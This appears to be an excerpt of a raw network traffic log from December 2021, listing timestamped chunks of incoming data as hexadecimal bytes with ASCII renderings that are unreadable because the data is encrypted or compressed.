                                                                                                                                                        2021-12-28 02:24:00 UTC1360INData Raw: fd 9d ed 76 3b e6 08 2e 10 8c d9 27 87 3e f8 df b1 ec e1 b0 c3 36 ad 6e 0b ef 9a 8a 31 d2 cb 1f b1 e4 a0 a5 1e 1c 13 d8 ee ec 34 32 b6 f8 a7 22 d8 6b 08 2f d2 ff 81 26 d0 e0 28 61 53 79 d8 6c 07 2c 93 29 aa 02 3d f3 13 75 96 1e e1 60 93 28 d8 69 f9 a6 5d 00 f5 30 2f 09 70 dd e0 b9 19 09 9d 47 bf cf 1e fd bf e4 3b 8b c7 30 07 19 6c 65 0c f7 fe 2d 9f 45 95 b4 70 98 46 c7 23 ef 10 32 6d 32 5f d3 70 67 3c f8 71 06 96 7d 3c 6e 47 32 08 62 d6 f3 b9 bc bc 2e c7 72 f0 d9 9d 66 5e ec ff 32 00 fd 2d 74 98 a1 54 63 da cc 72 4e fd b3 40 bf 0c b4 82 42 81 ee 7b da 53 2d 49 b3 46 94 d1 4c cb 0d c6 15 a3 94 b2 42 16 cf 32 ab d4 0f 82 5d a3 c9 a3 39 b0 bc 47 64 d3 e5 f4 e3 b0 04 61 f3 17 bf c9 26 95 4a 31 d6 a4 68 81 bb fa a0 f2 c4 1a d1 05 8a 47 f6 05 a5 f3 d7 fe cb 99
                                                                                                                                                        Data Ascii: v;.'>6n142"k/&(aSyl,)=u`(i]0/pG;0le-EpF#2m2_pg<q}<nG2b.rf^2-tTcrN@B{S-IFLB2]9Gda&J1hG
                                                                                                                                                        2021-12-28 02:24:00 UTC1376INData Raw: a4 b7 e3 12 c2 e3 33 ab 07 98 a8 54 a1 42 35 cd bf 6c 69 b8 8d f0 7d 92 91 68 ac 14 fa 5b 01 f8 80 82 0f 29 2b 97 11 b7 6d b7 3b 08 df 5c 68 6e 39 b9 ec 0c cf d9 81 e7 c9 1f 8b c0 b4 92 19 82 bd 4d 6c 2b 3a bb 00 94 ac 4f 6f 8f fd a0 69 6e 9e c6 51 96 0b 3d 1c 57 8e 8d 50 07 64 93 86 a7 c6 38 46 93 f9 57 fa 11 03 71 e5 e3 2e 93 99 3f 48 a9 a5 e0 6c bb 13 92 1e 40 3b 9d 09 72 6b d9 3b 6e 71 e7 66 3b 38 cb 06 bf e3 9a 2d d8 09 52 d1 d0 be 19 9b a0 94 f3 58 4a a5 45 81 5c 00 ee e8 aa e8 61 4f d9 2d 99 5a bb ce 87 9d 67 81 af 03 82 7c cc 5d 8e 5b 4a cb 7d 38 46 fe 93 37 cb 75 b2 1d ff 26 d7 5e 03 1c e1 83 d5 1a 47 f1 27 a6 5f d4 02 52 09 66 8c 2a 63 17 ff ec 9a f6 8b 84 47 10 87 88 c0 26 be 72 e8 93 e0 e7 97 d1 aa 2a db ec c8 64 2b 82 df 81 0b db 11 f3 09 24
                                                                                                                                                        Data Ascii: 3TB5li}h[)+m;\hn9Ml+:OoinQ=WPd8FWq.?Hl@;rk;nqf;8-RXJE\aO-Zg|][J}8F7u&^G'_Rf*cG&r*d+$
                                                                                                                                                        2021-12-28 02:24:00 UTC1377INData Raw: 7a 7b ea b4 31 57 91 f5 12 ec 88 39 fb 1f 14 45 ed c7 e9 71 e2 30 72 9c 42 53 45 1d 4b 2b 70 c0 6b 71 c2 84 40 3a c6 ee c1 60 97 a1 69 60 f2 47 f7 25 38 93 74 00 1d b4 e5 22 3d d9 5e c3 33 4e f1 49 d6 36 90 11 15 74 52 43 ea 4e 0c 89 7f 7c 39 47 29 71 20 85 1c b3 42 82 91 ff 5f 05 1f 28 eb 25 45 7c 54 04 be 30 a6 2b 42 47 94 46 02 c5 56 7a f6 ca 43 01 05 37 4e 5b c9 6e 74 88 f4 0e 90 16 f4 a5 a5 52 8e 35 b3 ec ca aa 47 68 17 18 8c 55 69 16 93 47 fc 35 10 af 46 8b b5 81 77 a1 89 75 d6 e6 90 91 4e 07 a0 f6 5c 28 ad d1 e5 17 b7 fc 5b c0 7c 37 78 fb b3 7d 61 4e a2 59 2b 63 a8 c3 b8 cf ab d4 7e f2 10 f5 3f 87 ca bb 2f 77 02 c1 14 dc ac ba 77 50 11 9c 8e 8a 31 ed 26 41 53 81 93 06 c7 3c 49 01 cf 53 e1 a2 90 af 7f 92 b3 5b 6f ee 10 c1 1e 36 19 10 01 1c 2c 92 a5
                                                                                                                                                        Data Ascii: z{1W9Eq0rBSEK+pkq@:`i`G%8t"=^3NI6tRCN|9G)q B_(%E|T0+BGFVzC7N[ntR5GhUiG5FwuN\([|7x}aNY+c~?/wwP1&AS<IS[o6,
                                                                                                                                                        2021-12-28 02:24:00 UTC1393INData Raw: 39 2e 7a 3d 73 78 f6 ab 69 71 01 bd e9 f0 d4 63 2a 18 e2 39 f6 07 70 95 8c 1e 5f 08 cd 55 e8 89 e9 81 a5 09 88 3f 11 94 57 18 58 0e d4 d8 b0 20 3c d5 18 3d ed 17 4d d4 58 b9 c3 b6 8a be 73 39 bb b9 db df 96 de e1 5d 2f c4 c4 f2 a4 bb ef c4 cc 13 a2 64 d9 4f d1 66 0d 09 43 c4 71 9a 86 07 cc 54 71 24 6b 69 30 e9 91 4a 3d 2d 83 36 71 1c 73 62 3e 72 91 6b 6e 45 d5 57 38 4a 27 66 32 7b e7 94 2c 52 f6 f3 bd 59 da 09 02 c8 6e 50 1d 42 19 2f ea 89 f9 fe 89 4b 69 cf 81 a0 c7 1a 54 02 4f a4 68 9d ab 4c 24 26 39 80 e8 3e 6c 7a 9a 52 f8 91 6c fc 1e e5 ea 3b 96 3e ec 36 fa b9 e5 f8 64 37 d3 24 a4 08 63 9e 19 60 53 94 e4 18 f0 0c 2d e4 b8 a6 c9 26 54 3a 54 2e 41 02 ff b1 12 e9 0c 3f cb 31 75 03 66 ca c1 b2 99 0e 22 4d 6e d7 e9 ec cb 5d 14 02 d5 25 00 d5 7f f4 57 f5 e6
                                                                                                                                                        Data Ascii: 9.z=sxiqc*9p_U?WX <=MXs9]/dOfCqTq$ki0J=-6qsb>rknEW8J'f2{,RYnPB/KiTOhL$&9>lzRl;>6d7$c`S-&T:T.A?1uf"Mn]%W
                                                                                                                                                        2021-12-28 02:24:00 UTC1394INData Raw: 18 61 0c 84 6a 1f ce e7 70 60 50 90 c9 d5 17 25 6b 54 ba bc c5 f3 35 f2 81 ec 45 76 b1 be 9f c3 ed 2c 66 6a d9 63 2c e3 e9 d5 74 03 a2 8b 25 fd 1e 56 42 6b 84 d4 23 93 b4 a1 4a 98 0a 92 23 9e 7e e2 58 91 c5 e0 6b 1e ce e4 88 ea eb 65 4e 24 74 4a 00 d1 87 38 72 9a 13 b0 18 d1 93 59 28 50 d1 53 f9 a3 f3 1d ca 2e 75 0a a3 36 f9 67 1b 78 fb 83 44 ba f3 3e c7 1b dd 6f a1 f2 a7 4a 02 7b 04 88 36 45 2d 3c d7 4c 70 1b 7a 51 82 50 82 fd a2 a2 ad 86 22 5b f7 e7 40 66 33 9b b7 b2 dc c5 b9 b2 e1 02 5e 32 74 fb 46 3b b2 a7 52 81 41 56 74 d2 56 c0 d1 0b 89 87 fd e0 7c c7 77 13 02 83 7b 80 e6 6e 7d f3 68 11 70 de a2 e5 e5 d2 df 49 77 48 24 e7 71 f5 59 ee 71 8b 97 43 db 59 4f 04 1d 7e db 50 6d 75 8e c5 59 94 ab 49 61 52 75 ae 06 1c d0 0e 25 74 95 af 1a 08 0e cf d2 5c 96
                                                                                                                                                        Data Ascii: ajp`P%kT5Ev,fjc,t%VBk#J#~XkeN$tJ8rY(PS.u6gxD>oJ{6E-<LpzQP"[@f3^2tF;RAVtV|w{n}hpIwH$qYqCYO~PmuYIaRu%t\
                                                                                                                                                        2021-12-28 02:24:00 UTC1410INData Raw: 7b 22 d1 c2 6d 0c 05 62 10 d9 05 ae 0c 18 0d 5c a9 b3 e2 c0 61 a6 00 d1 e2 e1 fe bf a3 bb 88 da a2 0f 0d 9f f9 7f 67 f1 de b4 23 7c b4 1e f9 c4 b6 f5 85 f9 55 be 4e e4 1c f9 e3 59 4a 58 9e cf a3 46 6e b6 19 0f 74 93 33 b7 74 e7 a2 ad 52 4d 89 c7 6d 76 77 83 c3 32 05 d4 59 a3 52 f4 d8 75 01 0c ec e3 6d 28 26 64 41 4d d3 aa 64 85 32 b7 79 a9 17 f5 3d 63 52 e4 ac 6f de 89 dc cb c1 96 d7 c0 ba 68 25 fe d4 b9 a4 3a d9 13 1f ba c4 4e 6e a1 03 49 9f d1 88 66 79 bd b5 c9 0a cd a4 a1 70 78 c3 39 10 5a e7 5e 31 5b f2 b3 32 3b 4a 7e 24 87 ed 2a ed a3 68 bb 5e 59 9f 53 99 85 12 cf a5 29 56 a4 a6 8b 97 d9 32 0f 06 0c f7 e3 82 4d 78 16 da 0e 58 72 3b 60 25 af 6f fb c5 95 6e 76 04 c6 65 56 b9 0e e3 f3 54 77 15 2b c6 e4 aa 65 98 f5 d8 bd e7 79 bb 5d a1 7a 5f 85 7a 79 58
                                                                                                                                                        Data Ascii: {"mb\ag#|UNYJXFnt3tRMmvw2YRum(&dAMd2y=cRoh%:NnIfypx9Z^1[2;J~$*h^YS)V2MxXr;`%onveVTw+ey]z_zyX
                                                                                                                                                        2021-12-28 02:24:00 UTC1411INData Raw: 72 21 95 05 ff 4a cc 3e 56 08 ef ee 07 f9 7c 31 cf 94 59 23 bf 25 b9 6e 73 51 38 81 9a d9 ec 6b 3d 9a 28 39 e8 1e f8 8b 52 dd 89 aa f2 e7 9b 2f a3 f0 a7 3e 17 ef 38 54 8e 37 73 4a 17 b4 83 db 5d 6e d2 11 71 83 8a 5a 48 a6 21 41 cd 77 c1 4f a4 e3 fe 76 e8 ad 2f 55 bf 4f 98 ce 5d 9e 59 60 94 fb 4d b2 aa 88 16 2b 7c b2 0b f1 bb 7f 8d 5b 55 e7 a4 1c 05 d3 07 70 a7 29 69 43 fa 45 61 b2 ac 1b 54 8b 2a cc a3 0a 3f e1 10 44 36 3c ab ac b9 39 c2 af 7b fa 78 fd 57 4a d0 63 c6 93 aa 72 8a 2f 3b 40 cc 35 9f 6f 6c 0a a4 42 26 a9 b8 86 4d 15 ae 12 6d b9 d2 44 27 3c 80 cf 31 01 10 e0 cb 32 c5 3c fd 3f a0 38 85 24 b0 31 30 a0 d5 06 1a 3d 57 39 69 61 2a 8f cb 58 7d 5b a5 c4 de 8f f7 31 e0 fe cb 82 e5 48 a9 5f 4d d9 0e 12 c5 8c 75 7b 45 cf 39 bd a1 c6 17 8b bb bd 49 3e 24
                                                                                                                                                        Data Ascii: r!J>V|1Y#%nsQ8k=(9R/>8T7sJ]nqZH!AwOv/UO]Y`M+|[Up)iCEaT*?D6<9{xWJcr/;@5olB&MmD'<12<?8$10=W9ia*X}[1H_Mu{E9I>$
                                                                                                                                                        2021-12-28 02:24:00 UTC1427INData Raw: 2f f0 5c 16 98 2a 91 e7 71 f8 b4 7a f2 d2 e5 10 f2 c5 89 74 38 b5 33 89 ef 79 88 62 3d 75 25 79 17 85 82 0f 6a 31 55 d2 5f f6 62 2f 9c 31 3f 56 72 fe bd 60 33 8b 2f cf e3 91 b6 28 42 41 a5 d6 25 04 4f 8e 5f 05 9d 3d 11 47 15 7a 49 7a b5 71 ba 3c 5d b0 67 d5 12 98 c5 a3 77 c8 90 51 ab e1 c1 05 fe 9e 50 d0 8e 9f 6a 49 8f 3b 17 83 bd 4e 58 5b d7 ce 26 49 86 23 63 72 ec 07 9e 8d 1a a9 75 9a 97 35 33 c8 c5 40 b9 f5 4b 79 7e 78 58 a8 7e 69 0f 96 95 18 74 92 20 ed 23 90 19 b8 4c bf 4a 91 2c 23 37 0d 61 6d ab bb 91 df fd 41 ca 39 99 61 c3 6d f5 78 35 15 cd 5d ff e3 cf 1a eb 28 33 3e b0 57 8f bf 58 f4 fe 38 67 73 3d 7c 7b 52 01 68 2b c8 c8 fd 4e 2c bb e1 b5 49 bc 4e 76 f0 b5 07 80 ea 73 57 a7 ae 24 39 05 db 78 f1 86 81 f9 70 d2 e7 f7 93 d3 83 13 00 ee 09 50 e1 4a
                                                                                                                                                        Data Ascii: /\*qzt83yb=u%yj1U_b/1?Vr`3/(BA%O_=GzIzq<]gwQPjI;NX[&I#cru53@Ky~xX~it #LJ,#7amA9amx5](3>WX8gs=|{Rh+N,INvsW$9xpPJ
                                                                                                                                                        2021-12-28 02:24:00 UTC1428INData Raw: 6c 69 d7 cd 9e 28 3a da 94 a3 5c cb 97 4f df c6 c5 f2 f1 ab 11 0f c7 e3 51 16 34 22 21 0b 3b 92 8c 2e 8e 11 a5 85 16 ae 74 fb 95 f8 44 ea f4 09 d2 3b 5c 6a a9 c4 0b 8f 41 31 f7 9f 22 53 30 48 72 a9 54 40 8a 07 b1 87 e1 d1 ed b4 a7 31 e2 16 e6 04 6b 00 fe cb 0e 0f f4 29 a7 fa ed ad 49 74 b5 1e da 0c 3d 45 fb 73 5b d0 2a be 17 d3 0b 92 d5 89 c3 3c c5 86 14 4a db 95 8c 5b 40 5b 75 5f ff a5 d4 fb 01 3f 7c 47 69 06 b1 91 06 5f 8b c8 e5 15 1a dc 51 a2 69 fe ee bb a1 32 a6 03 51 f2 b3 60 30 c6 23 21 22 81 7d 13 66 9e 83 a6 d1 e6 2e 46 b7 cf 9d 84 80 a9 d9 8c 0d 50 07 86 49 24 70 65 e7 df 98 2e 60 ef 8f 35 a2 c1 ba e6 4d dd 84 f7 87 08 aa 3c 1f 66 4c e5 f6 f1 c0 e8 7a c9 18 70 c8 b3 4a 4e ed b2 86 b7 a7 50 28 0f b3 46 38 dc d0 9f af f5 e1 5a 27 c2 86 63 40 e2 2d
                                                                                                                                                        Data Ascii: li(:\OQ4"!;.tD;\jA1"S0HrT@1k)It=Es[*<J[@[u_?|Gi_Qi2Q`0#!"}f.FPI$pe.`5M<fLzpJNP(F8Z'c@-
                                                                                                                                                        2021-12-28 02:24:00 UTC1444INData Raw: 98 8a ab 2c 58 34 7f bc 51 32 de 7d 94 b1 8f 6f 5b 0d a5 70 b2 30 55 c6 f0 22 2f 38 12 0c dd 30 0b d7 07 70 5d a9 85 08 d1 2c 27 b8 43 c3 cd 9c 24 99 da 01 e7 1a ac 4c 0e 83 e9 4d 2d ab ee cb 77 2b 0f 5f b2 e5 6e 04 e3 56 4b 3c 88 9f b5 54 b0 98 05 70 41 d8 1f 87 be c0 12 83 75 ff f1 e4 92 18 df b7 db 6a 9c 5a 11 fa c3 2f a4 43 65 a1 e9 13 42 85 8e 11 70 42 ed 13 a9 a9 30 9c 50 24 65 c9 d6 ef 5e 15 b9 2f ab fb 2e 7d f8 60 6e 11 e5 35 32 d9 fe e5 60 e8 fb 18 72 fa 02 c0 fc 36 40 32 49 c7 92 9c 3f 77 88 1a 6d fe 81 17 05 c5 a8 3d cd ab ae e4 7c 44 86 8d c1 a0 0c d6 45 e9 a7 98 be 2d 79 41 d8 f3 85 3f 5c 61 52 18 82 5c eb e4 0a f6 5f 18 01 8e 77 78 f0 97 6b a9 05 4e c7 bb 65 20 21 1c 6d 7d 1b e2 8e 40 81 e0 11 dc 91 57 c9 59 54 0a 2a 90 1d 44 e3 04 bf 60 80
                                                                                                                                                        Data Ascii: ,X4Q2}o[p0U"/80p],'C$LM-w+_nVK<TpAujZ/CeBpB0P$e^/.}`n52`r6@2I?wm=|DE-yA?\aR\_wxkNe !m}@WYT*D`
                                                                                                                                                        2021-12-28 02:24:00 UTC1445INData Raw: cc b3 ec 93 dc 1c 16 63 2a af 1e 03 f1 12 27 42 a3 cf fe 62 ce ae f1 7c c4 73 d2 87 8b d5 ab 73 07 aa f9 2f 44 11 89 88 79 9b 0f b6 54 14 fd 1e 27 f6 71 b9 0b e0 dc 79 7b 9a 50 cd af 72 0a c3 69 09 76 8e 07 65 ff b0 b2 85 e7 b4 62 cb 47 b6 b9 05 3f f2 0f eb 97 9d 0e 7d cc dd e9 0c 26 6a 1c 5a c0 d0 42 e6 78 9b 15 c6 a1 25 12 22 81 e3 03 c8 ae 0d 83 6d 99 61 f4 53 a9 d6 0d 1d a3 71 f1 87 13 8c 6a 77 9d 7b 94 b4 85 97 a4 0e 38 1c 9c 5d fa b6 00 14 2c 8b 2c 01 bb 56 4b e6 bb 57 eb b9 c3 c5 90 d8 a1 de 60 96 8f 39 ba ab fe 5f 70 97 9c 97 8f a6 3a 20 7a b4 21 f8 99 a8 34 17 24 eb 7e be db 7c d2 8e c8 ba c6 79 33 54 09 24 90 a1 49 5c dc b5 4a 7e 88 2c 7e 36 72 84 33 27 e0 d6 fa bf 13 43 fd be 90 15 ec 1e cd 9d af 63 98 47 3c c1 35 15 6e 8f e1 5a b9 58 cc 34 4e
                                                                                                                                                        Data Ascii: c*'Bb|ss/DyT'qy{PrivebG?}&jZBx%"maSqjw{8],,VKW`9_p: z!4$~|y3T$I\J~,~6r3'CcG<5nZX4N
                                                                                                                                                        2021-12-28 02:24:00 UTC1461INData Raw: aa ad 43 3f 38 9a 08 d9 a7 ea b3 d3 96 05 86 9c ea 92 2b 3b 3e 1a 97 f3 e3 23 7e f1 58 13 9f 84 e5 5d c5 3a fe 5a 42 6e 12 0e 4a 9e 3c 42 14 0f 35 fe 86 29 ad aa 6d 69 e5 bb f5 02 c8 73 f8 92 a7 59 db 76 23 85 1d bc d1 e0 d8 60 2f 79 2e 49 75 c8 2b 91 83 d5 38 f8 70 e0 70 88 27 70 15 10 b4 9b cc 8b ae 14 fc 54 b4 c7 79 b6 ff 8e e6 53 f5 f1 f7 76 79 97 3c 49 3b 85 12 d3 93 a3 5f c7 29 f9 6b 13 14 a9 39 8c 4e 73 90 35 dc 46 a2 e3 ac a7 7b e2 df 5d eb 1d ce 7d 1e 0a b2 21 cc fa da 1c 29 ad 90 fe 61 ce 3f 0f 17 3a 46 6b 33 e2 90 67 1f a8 9f bc 82 c3 db ce 47 0a 22 79 5e 16 fc 0c 66 8d 48 24 bc 6e 88 31 87 d6 46 04 fd fb 22 12 62 1e 05 cf 65 5f 7b e5 49 fd 93 d6 d4 4a e9 09 a3 aa 01 1f a4 05 c5 3d 8c a1 de 21 bf 78 ab 25 43 30 96 11 9c a1 8d cd 05 89 a8 19 80
                                                                                                                                                        Data Ascii: C?8+;>#~X]:ZBnJ<B5)misYv#`/y.Iu+8pp'pTySvy<I;_)k9Ns5F{]}!)a?:Fk3gG"y^fH$n1F"be_{IJ=!x%C0
                                                                                                                                                        2021-12-28 02:24:00 UTC1462INData Raw: 84 46 91 ba f7 0a 3f 72 5b d0 ad 51 d8 96 51 62 8e db 1c bb e0 d2 60 3c af 98 53 e0 7a a2 4a e2 eb e9 22 77 41 95 18 4f 1c bb 69 d7 50 3f 65 07 d3 33 91 c8 4b e8 43 74 bb 3e 20 af b4 6c 01 08 67 75 51 41 6c 41 52 1d ee fc fc b4 e9 d8 48 f4 08 ef fd ca 42 37 3d 26 7b 44 14 f9 79 6a 59 d2 be ff 22 a9 59 5d 93 d1 2a e0 bf 35 20 38 18 a3 63 1b cb fd 2f 22 19 76 7c 7f 06 93 b2 6c 0c e6 d5 29 63 35 0d d0 5d 89 71 63 8e c4 7a b4 e8 9d 52 56 31 2a c4 39 8f 15 ba 85 7d 78 40 9b c2 fc df 60 da 1b 44 68 4c d2 96 3a 2e b0 34 2e 92 08 53 ab 80 6c 26 7f 76 5b 8c e8 5a 52 fe 39 9e 42 68 b7 1b 97 3b 03 67 9e f2 07 33 d6 b1 30 ce c4 7c f9 08 dc 2a 0d 12 58 0e bf 8e a0 36 b3 02 28 5e 81 04 f6 64 b1 0c c7 34 b7 73 93 09 00 a5 b0 0b 2e a2 f4 27 ff 30 87 48 30 a8 52 f8 f9 c4
                                                                                                                                                        Data Ascii: F?r[QQb`<SzJ"wAOiP?e3KCt> lguQAlARHB7=&{DyjY"Y]*5 8c/"v|l)c5]qczRV1*9}x@`DhL:.4.Sl&v[ZR9Bh;g30|*X6(^d4s.'0H0R
                                                                                                                                                        2021-12-28 02:24:00 UTC1478INData Raw: 8d c8 91 d9 75 5a c5 ce db 6c 15 a4 3b 01 d8 b2 4a 9a 7a af c4 47 6e 20 56 fa 2a 0b de f5 34 ab 0f c4 e6 75 2b dd a1 32 df c6 2a 27 ad 78 4c d7 c6 d0 f7 d2 21 78 85 f2 5c ad 39 22 56 87 b1 43 ae d8 3c 36 0b 75 5e 47 ee 1b e0 83 54 3f 24 49 09 00 aa 51 d0 29 a2 13 19 86 f1 fb c3 d9 55 4e c2 26 cc f8 13 92 67 76 f8 db 0b 2e 86 0f 42 5b 94 e3 6a 39 b3 f7 02 b5 95 74 4b 6b 19 d0 62 e2 fb 04 98 7e 8a 4e da cc 66 ff 0d b5 39 5d 6a 6b 95 28 da c5 09 cd 53 2c 69 df d7 06 3d 87 67 a0 a6 4c 3d 26 33 c0 86 4d 78 6d 2f 8e 9c 90 92 b1 65 4f 77 87 de c2 51 84 cf b4 f5 39 37 d0 cf de 16 fb 63 9c c9 1a f9 8b e2 7e fb 06 3d dd 13 d2 d0 02 1c 0e c3 26 93 75 58 6a b5 42 6a 7e 8b 35 fa bd e2 ad d8 cf 1b f7 a5 ca bc 69 95 44 9f 6f c5 28 0a f7 ae f9 bd a9 dc 8b a2 6e b6 98 de
                                                                                                                                                        Data Ascii: uZl;JzGn V*4u+2*'xL!x\9"VC<6u^GT?$IQ)UN&gv.B[j9tKkb~Nf9]jk(S,i=gL=&3Mxm/eOwQ97c~=&uXjBj~5iDo(n
                                                                                                                                                        2021-12-28 02:24:00 UTC1479INData Raw: 9d 2e 0e 0e 96 4c 22 13 55 a4 46 c5 45 51 2b d6 48 cc 51 27 d7 80 f3 14 71 0d 6a 48 07 95 4b 49 e0 df e2 e6 77 6c 34 ca 92 9e 79 bc f0 8f ec 41 58 5a 0f 2b 24 27 87 00 3c 3d e8 73 83 8b 96 9f 4a 24 41 a0 1c 93 86 ba 2c 36 18 f4 b1 9d 18 13 41 fd 3f 07 75 e6 16 46 4c 9b 9d da 1e f4 0a ec 14 38 af bc 4e c3 1f c3 64 3b b4 16 e9 38 8d be d5 e3 01 34 db df af 39 8e a5 68 a6 26 39 23 89 73 ac d2 7f 0d e3 11 19 67 88 a1 59 ac 3e 0e da 94 14 fa cd 02 3e 5d 4d ab fb 12 90 d2 94 0b e7 f0 bb 05 8a ce 99 2c 07 34 37 93 3d 6d 9e cb 5a b7 a4 ec da 6a cb 01 26 5e 86 ca 12 f2 9e e4 c7 ad 33 bb c7 37 ca 0b c8 af 36 8a ac 56 63 c6 2b 17 cf ab 0e 5b 84 95 4e 43 ae a2 1f 57 1d 1b 7d 1b e8 aa 32 51 1b 87 c7 b9 f1 84 ff ef 21 a3 6e 88 bc 95 29 ce 34 12 14 54 ad a0 f0 7a c1 d0
                                                                                                                                                        Data Ascii: .L"UFEQ+HQ'qjHKIwl4yAXZ+$'<=sJ$A,6A?uFL8Nd;849h&9#sgY>>]M,47=mZj&^376Vc+[NCW}2Q!n)4Tz
                                                                                                                                                        2021-12-28 02:24:00 UTC1495INData Raw: 45 17 74 d7 d5 46 79 23 67 50 98 b9 b1 2f 07 ce ea 44 df 71 30 e1 ab 9c 10 92 c6 39 1c 51 69 e6 44 0a 66 f7 0b 8b 8c 78 04 02 e1 d3 a3 3f 29 11 6c 49 6b c5 3c 2b 19 0e ba a1 5a 7d 1c b3 65 8e 05 5f c2 3d b5 d2 20 ff d0 de d2 8c 8e b9 a1 8f f5 74 7a eb b4 1c fd 91 a8 d7 1e d2 f0 6f 95 fc e5 5b fd 6b 14 5a 59 5c 5a 1e 68 2f d9 35 7b 70 f6 c5 91 dc b4 0b 15 2d 50 18 df a4 12 6e f8 dc 2e 77 2d 25 01 69 28 7b 1d 60 01 87 54 26 dd 53 94 e6 02 2f be c3 3d f9 6e 81 46 81 87 bb 2f b7 74 18 d8 09 1b c0 c9 8b 86 71 df 9f c0 c8 f2 fa 35 82 96 9f de 1f 80 71 33 e7 b4 68 0d 83 f3 d1 3c 31 77 aa 5b ef db 51 0f 08 47 2e 89 cb e9 6f 8e cb 11 83 40 20 14 26 5d e2 1a d4 ad a4 3f fb 06 b1 38 9d 0a 52 dd f7 8f 66 c0 fc 38 7b 8d 54 5c 4e b8 b0 ba 72 94 83 d2 58 f4 4b 9b cf d8
                                                                                                                                                        Data Ascii: EtFy#gP/Dq09QiDfx?)lIk<+Z}e_= tzo[kZY\Zh/5{p-Pn.w-%i({`T&S/=nF/tq5q3h<1w[QG.o@ &]?8Rf8{T\NrXK
                                                                                                                                                        2021-12-28 02:24:00 UTC1496INData Raw: 76 0b 0b a7 11 21 aa 1a 3d dd 4c c4 3f 5c ed 60 85 2b e3 ee 22 26 a7 83 03 29 a9 5c ba f7 59 a4 66 b9 c8 84 cd 31 3a c6 23 0f 00 e1 80 37 56 5a 69 63 25 84 b8 45 d3 ff b8 fc d9 07 64 72 4c 0a 11 ca 96 71 96 da 5d 37 e8 ae 7c 4e 64 4c 9d 7a ad e4 bc fc 69 02 40 d0 3d 89 ef 90 c8 db 17 35 e7 ea be 95 d7 dd f4 9f b7 87 a7 30 b3 8b 27 21 47 67 0e 54 eb c6 c2 0c 73 43 47 a5 24 c0 25 df fb 50 02 26 c7 46 66 74 56 86 2e 3b 9b a0 78 57 e7 7c 96 4e ec 6d 68 5a ee 06 12 f4 95 fb 35 48 63 17 b6 76 b5 cd 15 ad 07 c5 03 69 05 e0 82 51 79 1c 74 77 00 fc 7f cb e0 fb 41 22 f3 d5 da 8e b7 ca 50 3d 38 fb c0 ce 4e eb 91 63 c2 8a 34 bd c0 75 ee 68 e3 33 b5 84 97 7e 2d 06 06 f4 bd c0 31 c3 cd 9f 19 e9 eb 38 20 39 9c 9b da 06 e1 ce 85 16 82 22 f8 9c a3 99 2f fd a0 bd b2 b4 b4
                                                                                                                                                        Data Ascii: v!=L?\`+"&)\Yf1:#7VZic%EdrLq]7|NdLzi@=50'!GgTsCG$%P&FftV.;xW|NmhZ5HcviQytwA"P=8Nc4uh3~-18 9"/
                                                                                                                                                        2021-12-28 02:24:00 UTC1512INData Raw: 3a fb ea cc 51 12 ef 4d a6 a4 22 0b c1 02 14 d5 4f 1c be 54 07 c0 5d ce 19 6f 89 c3 6f a1 d5 16 40 11 a2 6d 8a aa 9d 81 01 79 5e 1a 31 64 65 d0 70 dd a5 87 6a 44 f4 f4 8a 6c 8b 25 9a 55 18 2e 5a 68 7a 4d 27 d0 2a cc fb 16 ab 39 5f 61 81 40 a5 bc 74 b3 63 08 12 89 15 9a 8a 72 da f4 0d 5f 44 69 f0 64 26 78 52 0e 26 b3 45 2b 88 a2 6b fa ca 7e 7e 2a ea be f8 57 88 3f 85 14 eb 78 1f 70 ae db 8b bf fb 96 e8 3e 4b 34 f8 fa fc d6 c7 c8 75 ce 96 31 f1 0d 7b e3 43 37 ee 3c 11 33 11 6e 01 61 b8 d7 5f bd e5 25 f8 22 46 5c 15 e2 aa b7 a8 4b b8 ae db c3 4c f2 ba d8 6e 44 88 b6 f6 f1 cd ab c3 50 c2 83 39 78 aa 46 a7 bf 3a aa 7c aa dd d3 db 03 9b fe c3 7e 14 b6 ca b7 fa 09 10 d9 67 4b 53 a5 4b 7f bf 2d 23 08 c8 c4 91 a9 19 28 2b 7f 25 d1 ff 35 b7 e0 39 fb ee 19 e5 e5 27
                                                                                                                                                        Data Ascii: :QM"OT]oo@my^1depjDl%U.ZhzM'*9_a@tcr_Did&xR&E+k~~*W?xp>K4u1{C7<3na_%"F\KLnDP9xF:|~gKSK-#(+%59'
                                                                                                                                                        2021-12-28 02:24:00 UTC1513INData Raw: de c9 4f d5 c4 e8 64 a7 25 09 6c 4d fd 7c 6d 1f 14 12 e8 a6 aa a3 27 06 cb 42 f4 fe 21 e1 e3 1f 80 93 6d 8d 38 09 02 ea b6 c6 3f 78 f6 90 97 67 2f 93 35 43 dd 5f d6 06 99 3e 58 f0 55 0f ca bc 7e e7 50 2c a6 4a d5 2d d0 58 e2 c2 d1 71 07 93 e7 63 c3 dc 9a 34 72 7b 46 1b f1 e3 f7 71 03 36 a3 07 83 6f 56 05 84 65 ed 34 94 80 2d 61 de df 77 ec ca 0d 52 d6 29 8e 13 b2 71 08 a1 5e 49 f3 e3 31 ec 3c a8 9c f8 37 a8 ac e7 be 8c ac 62 41 3e 20 2e 6f 7b df a2 37 35 cd a3 a3 87 c0 87 de 08 40 1a 95 60 09 27 79 b7 1b 1c e4 cc df 27 67 01 9a 96 83 61 da 3a 31 79 47 8a 2f 42 62 ba 38 9d 33 aa 7d 6d 1b ba 03 f5 4f b6 ce 03 5a bd b3 20 a5 93 03 ff 6c 75 1b 21 d8 04 f2 a2 4c c5 6f 67 25 d9 fc 51 b0 a1 a1 a5 3a 98 7a cb fa 02 69 fb 1f 5a 4c a0 57 26 a0 f7 85 79 de 55 ec c8
                                                                                                                                                        Data Ascii: Od%lM|m'B!m8?xg/5C_>XU~P,J-Xqc4r{Fq6oVe4-awR)q^I1<7bA> .o{75@`'y'ga:1yG/Bb83}mOZ lu!Log%Q:ziZLW&yU
